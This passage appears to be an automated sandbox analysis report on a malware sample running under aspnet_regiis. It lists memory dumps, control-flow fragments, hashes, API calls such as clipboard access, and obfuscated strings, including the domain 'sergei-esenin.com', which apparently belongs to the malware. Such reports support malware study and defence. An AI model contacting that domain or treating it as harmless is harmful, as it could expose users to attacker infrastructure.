                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: }({
                                                                                      • API String ID: 1029625771-3992779883
                                                                                      • Opcode ID: a9f887d399dab05f111811515f642ba84eb92a6d6dfb592c10585a96b7a81803
                                                                                      • Instruction ID: b0ca863e2d73712468ea9fa094b29c5171875a7ff2503568efae8f696322c74f
                                                                                      • Opcode Fuzzy Hash: a9f887d399dab05f111811515f642ba84eb92a6d6dfb592c10585a96b7a81803
                                                                                      • Instruction Fuzzy Hash: 842148722593404BD314CFA5DDD27ABBBE0EBDA304F18093DE1D157391D2B889098B5A

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 302 58dac0-58dad1 303 58dad8-58daf2 302->303 304 58db80 302->304 305 58db82-58db88 302->305 306 58db00-58db5b 303->306 304->305 306->306 307 58db5d-58db74 RtlFreeHeap 306->307 307->304
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0058DB69
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 6649bbf0c11e2710cbf874c65482368e04164dd4f99e74d9854f7a496b33a425
                                                                                      • Instruction ID: e79b256ab2d689a9f628db78e814a7c3d895a23dbdb2e3fad7cd877128320e75
                                                                                      • Opcode Fuzzy Hash: 6649bbf0c11e2710cbf874c65482368e04164dd4f99e74d9854f7a496b33a425
                                                                                      • Instruction Fuzzy Hash: FE115937A152204BC314CA7CCC9565BBB96DFDA221F2B462DECD89B3D1DA715C0583D1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 327 59092a-59093a 328 590940-590998 327->328 328->328 329 59099a-5909e4 GetForegroundWindow call 593940 328->329
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32 ref: 005909B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: ForegroundWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2020703349-0
                                                                                      • Opcode ID: 8959208856fbceae0595500bcc9b7ae1a4eaea33d7da2341af6b12679c45bd65
                                                                                      • Instruction ID: 0d01fe1d129d1b4b2fa49cbd5ddf5e9789294d1131b9ac4a10e00423078e418c
                                                                                      • Opcode Fuzzy Hash: 8959208856fbceae0595500bcc9b7ae1a4eaea33d7da2341af6b12679c45bd65
                                                                                      • Instruction Fuzzy Hash: 2A114C779887144BC718CF7CECC2016BFD1EBE2260B19563ED5A2833E1D5785D4D9641

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 333 58da90-58daa1 RtlAllocateHeap
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(?,00000000), ref: 0058DA95
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 25760631175eb671bfd3136b3e97cc537f30cb1574daf7f907d81d1c8a2c621b
                                                                                      • Instruction ID: 6e585aaff42a4c5f93f4d87ee19796cdb418c3cf55d65160a72cf54f3c9ab3a4
                                                                                      • Opcode Fuzzy Hash: 25760631175eb671bfd3136b3e97cc537f30cb1574daf7f907d81d1c8a2c621b
                                                                                      • Instruction Fuzzy Hash: 7FB09230148100CBC6084B20EC04B203639AB6E211F20104A9409055A1C6315856EA40

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 334 5909a5-5909bc GetForegroundWindow call 593940 337 5909c1-5909e4 334->337
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32 ref: 005909B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: ForegroundWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2020703349-0
                                                                                      • Opcode ID: e1b5503d1e446dc9f8f1b62cbe34899790126077fa9f05e15ab960a3b75d8b8b
                                                                                      • Instruction ID: 9e1081cef2fe0497010021a629d80940eedaee10cd329c66fd6652c12aef5e7d
                                                                                      • Opcode Fuzzy Hash: e1b5503d1e446dc9f8f1b62cbe34899790126077fa9f05e15ab960a3b75d8b8b
                                                                                      • Instruction Fuzzy Hash: 66E0C23AA04100DFD704DF28FC964343BA0EB2A214306056BE043C3361C6345A1CEB93
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AC$M0O$ !$*($*($4E:G$6I5K$Hu@s$HyK{$aQaS$eUgW$l]j_$n9m;$r1`3$sAuC$u5`7$AC$MO$MO$]_
                                                                                      • API String ID: 0-3249452353
                                                                                      • Opcode ID: 69d9c203da0bd4d44beab9319c5f8550bf01830a7bd972941176e855ca25b690
                                                                                      • Instruction ID: d286deec80a207478258115d76a65c22dbf8751a58157a5449804daf2a14d9b0
                                                                                      • Opcode Fuzzy Hash: 69d9c203da0bd4d44beab9319c5f8550bf01830a7bd972941176e855ca25b690
                                                                                      • Instruction Fuzzy Hash: F292BCB5A00715CFDB24CF25D8807AABBB2FF89300F558A9DC4996B751DB30A942DF90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8>7$-(#$/Hla$4_2]$AE^1$BHla$NLF|$]\C $gav`$sgz/$z\B=
                                                                                      • API String ID: 0-43102410
                                                                                      • Opcode ID: 8625f05ecaabc373b051b364a856c05e8e9407ee6738e74e40e70a2fa85381ed
                                                                                      • Instruction ID: 6b141d724db7e9cd2845c8712d2a6dd94b3e73be4f426c34767636ef9c44711d
                                                                                      • Opcode Fuzzy Hash: 8625f05ecaabc373b051b364a856c05e8e9407ee6738e74e40e70a2fa85381ed
                                                                                      • Instruction Fuzzy Hash: 65F20370504B818EE726CF35C4917A3BFE1AF57304F0889ADC5EB4B682D779A40ADB61
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                      • String ID: !$!$"$"$'$,
                                                                                      • API String ID: 1647500905-753487525
                                                                                      • Opcode ID: 8996e90f032804558cfe1a0edceed07a0cd818ce03c3473dfede3457694c8abc
                                                                                      • Instruction ID: 999b21e62567bdd175408b5fac7f2edd578966a9890ac418671b427a259254ae
                                                                                      • Opcode Fuzzy Hash: 8996e90f032804558cfe1a0edceed07a0cd818ce03c3473dfede3457694c8abc
                                                                                      • Instruction Fuzzy Hash: D441B771909396CFDB00ABFCD8483EEBFA0AB55320F150A29DC91A72C1D3754948CBA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                                      • API String ID: 0-3385986306
                                                                                      • Opcode ID: 8aa32da55a988c76eb1b367bcf1c0e1d4e82f36a6faacf38517b5ae69dc531e4
                                                                                      • Instruction ID: 739aee2a4c5cf3e85e6b2a32db33de3ae1064b583a5b7f7e4284292c1d148467
                                                                                      • Opcode Fuzzy Hash: 8aa32da55a988c76eb1b367bcf1c0e1d4e82f36a6faacf38517b5ae69dc531e4
                                                                                      • Instruction Fuzzy Hash: 4782B4756093818FC719CF28C4A432ABFE1BB96305F18895EE8DA97391D374DD49CB82
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !./7$%*+($1>?<$ET]?$L$LM[$P$URSP$[AJ$anol
                                                                                      • API String ID: 0-2024409930
                                                                                      • Opcode ID: 140116f189ecb48a1096c9da80deb76cc73a0818d093eca4a9e5fb9c932727d4
                                                                                      • Instruction ID: 681d4a9bde93cd30c5b15bf2170094aa8e20e7b9d15d81037012d96344f3dbc6
                                                                                      • Opcode Fuzzy Hash: 140116f189ecb48a1096c9da80deb76cc73a0818d093eca4a9e5fb9c932727d4
                                                                                      • Instruction Fuzzy Hash: E3A2BD716083818BD724CF25D8917ABBFE2FFD6304F18892DE4D98B292D7799805CB52
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8>7$/Hla$4_2]$BHla$gav`$z\B=
                                                                                      • API String ID: 0-2584419158
                                                                                      • Opcode ID: c1ed73868327030fcd6049c191585a10c7af09893101ba9a2e63cfb9d05959bf
                                                                                      • Instruction ID: fe2e24fe8c4e553b43801bf03a9bc77fc2ffaf97680190873770325f231f12cc
                                                                                      • Opcode Fuzzy Hash: c1ed73868327030fcd6049c191585a10c7af09893101ba9a2e63cfb9d05959bf
                                                                                      • Instruction Fuzzy Hash: 1482E570504B818EE726CF35C4947A3BFE1AF53304F4889ADC4EB8B692D779650ADB21
                                                                                      APIs
                                                                                        • Part of subcall function 00584BE0: OpenClipboard.USER32 ref: 00584BFB
                                                                                      • CoUninitialize.OLE32 ref: 00561255
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClipboardOpenUninitialize
                                                                                      • String ID: Vqvw$nEjK$sergei-esenin.com$k=e$oi$w'q${u
                                                                                      • API String ID: 282776578-1857108234
                                                                                      • Opcode ID: 488a6de8ff20071b5e3e94216e9c7ad636818efb02b6b432bf1716dbdb297e52
                                                                                      • Instruction ID: 69928f6ebe7a61e4ce41b5a649817679de56dc5cf483aaf5179f6012ff6388d8
                                                                                      • Opcode Fuzzy Hash: 488a6de8ff20071b5e3e94216e9c7ad636818efb02b6b432bf1716dbdb297e52
                                                                                      • Instruction Fuzzy Hash: CC5230B1204B418FE7248F25D8A572BBFB2FF96304F18855CD4864BB92D739E846CB91
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !!KM$%!?-$-:4$>408$BAoo$BjW$BkW$EAFD$TY
                                                                                      • API String ID: 0-1566944473
                                                                                      • Opcode ID: 121039ed4f4fbda681948424c769c2ee554c15585af2c3cd391a8488f4bf8a6c
                                                                                      • Instruction ID: 50fe0b3adce80e85feaba4b562a75b8ac339bac329b3515b143886f88846e472
                                                                                      • Opcode Fuzzy Hash: 121039ed4f4fbda681948424c769c2ee554c15585af2c3cd391a8488f4bf8a6c
                                                                                      • Instruction Fuzzy Hash: E2320F75A00626CFEB14CF68EC907AEBBB2FF58310F1A81A9D545AB391D7309941DB90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $IJK$%E*G$-Y4[$5]0_$9Q=S$:U*W$D9y;$T1]3$^)O+
                                                                                      • API String ID: 0-1134212892
                                                                                      • Opcode ID: f64a371bdf05ba3950b596dd86686690d4ed10c528a46891601865e8f88c51d0
                                                                                      • Instruction ID: fc9a0de9f7dc7b138e65beff155cd1a0eca2f2c754828879ccac451ce03cfc49
                                                                                      • Opcode Fuzzy Hash: f64a371bdf05ba3950b596dd86686690d4ed10c528a46891601865e8f88c51d0
                                                                                      • Instruction Fuzzy Hash: D7E1DEB1608341DFE720CF24ED90B6BBBB1FB95300F55882DE5C99B251D734990ADB92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2-$J%{o$Oz|{$\402$ax`g$f$km$lxyg$rkOL
                                                                                      • API String ID: 0-1937825257
                                                                                      • Opcode ID: 9412e4017cbadb1f459ba9005e3dc8965fb1477e5eddcd1d6e48edd8a52363dc
                                                                                      • Instruction ID: a173dc8baa6b3184dea71831180ea79056ffe2b4ff0d0ed64d7d511940b3e340
                                                                                      • Opcode Fuzzy Hash: 9412e4017cbadb1f459ba9005e3dc8965fb1477e5eddcd1d6e48edd8a52363dc
                                                                                      • Instruction Fuzzy Hash: B591B07150C3848BD329CF2984A17ABBFE0FF96305F14496DE8E54B391C7398909CBA6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "4Y$D2Y$F3Y$r8Y
                                                                                      • API String ID: 0-2493739190
                                                                                      • Opcode ID: 73d981e85e47fd96485fbbaba3a3e27d77826974794bc8d0e5b1ad186be4897c
                                                                                      • Instruction ID: 215871598052e944a15f08f01ad03dd1cdebe56748c27c5562175680d28a3700
                                                                                      • Opcode Fuzzy Hash: 73d981e85e47fd96485fbbaba3a3e27d77826974794bc8d0e5b1ad186be4897c
                                                                                      • Instruction Fuzzy Hash: 00620435B14251CFCB08CF68D8A16AAB7F2FF9A310F0A847ED94697351D7349949CB80
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "4Y$D2Y$F3Y$r8Y
                                                                                      • API String ID: 0-2493739190
                                                                                      • Opcode ID: bd281989e1ab17de12d7a448b16cff2c02595ad8b43b94fcb021ccf2be1a4177
                                                                                      • Instruction ID: 65f1aef52777f64aa58d6dfb54ee9330a7faca1bf6ab27c871418fd840f90eeb
                                                                                      • Opcode Fuzzy Hash: bd281989e1ab17de12d7a448b16cff2c02595ad8b43b94fcb021ccf2be1a4177
                                                                                      • Instruction Fuzzy Hash: C832F236B15211CFCB08CF68D8916AAB7F2FB8D314F0A857ED89697351D734A949CB80
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "4Y$D2Y$F3Y$r8Y
                                                                                      • API String ID: 0-2493739190
                                                                                      • Opcode ID: b06d76ca3cc308533bbe4ab979448a008322554e9991e7f159bc5cbd80e3e05b
                                                                                      • Instruction ID: 29d897433e0b4536e093552d4b5d5f8ee8d4cb127c7fdfdcfc32a1fc7a476915
                                                                                      • Opcode Fuzzy Hash: b06d76ca3cc308533bbe4ab979448a008322554e9991e7f159bc5cbd80e3e05b
                                                                                      • Instruction Fuzzy Hash: 57320336B15215CFCB08CF68D8916AABBF2FF89314F0A847ED89597351D7349905CB90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8;$LM
                                                                                      • API String ID: 0-465348834
                                                                                      • Opcode ID: 20017171285031ddc8ca2bde7da58deac44f2d1c9dc6c95f59ebeb0607814044
                                                                                      • Instruction ID: 090cb8c5c8850d9bc879ae554213c3b70c4a7d874b82b5efd832c6224d51d60f
                                                                                      • Opcode Fuzzy Hash: 20017171285031ddc8ca2bde7da58deac44f2d1c9dc6c95f59ebeb0607814044
                                                                                      • Instruction Fuzzy Hash: F4F1C9B45183458BE700DF64E89166BBBE0FF96314F048D2CF4D89B291E3789909DB96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972487759.0000000000595000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972506737.0000000000598000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1972528821.00000000005A8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_550000_aspnet_regiis.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "4Y$D2Y$F3Y$r8Y
                                                                                      • API String ID: 0-2493739190
                                                                                      • Opcode ID: 7e7f9715d671c206c3ff99c9d3728093ac0382aac0c4130ed36f8398d7441e7f
                                                                                      • Instruction ID: 1eb0dca988aa829403ab788654555e673499bd65d7bd79dcf0fb091d94d3637f
                                                                                      • Opcode Fuzzy Hash: 7e7f9715d671c206c3ff99c9d3728093ac0382aac0c4130ed36f8398d7441e7f
                                                                                      • Instruction Fuzzy Hash: 4F220136B14215CFCB08CF68D8916AABBF2FB89314F0A817ED896D7351DB349905CB90
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1972455175.0000000000551000.00000020.00000400.00020000.00000000.sdmp, Offset: 00550000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1972436375.0000000000550000.00000040.00000400.00020000.00000000.sdmpDownload File
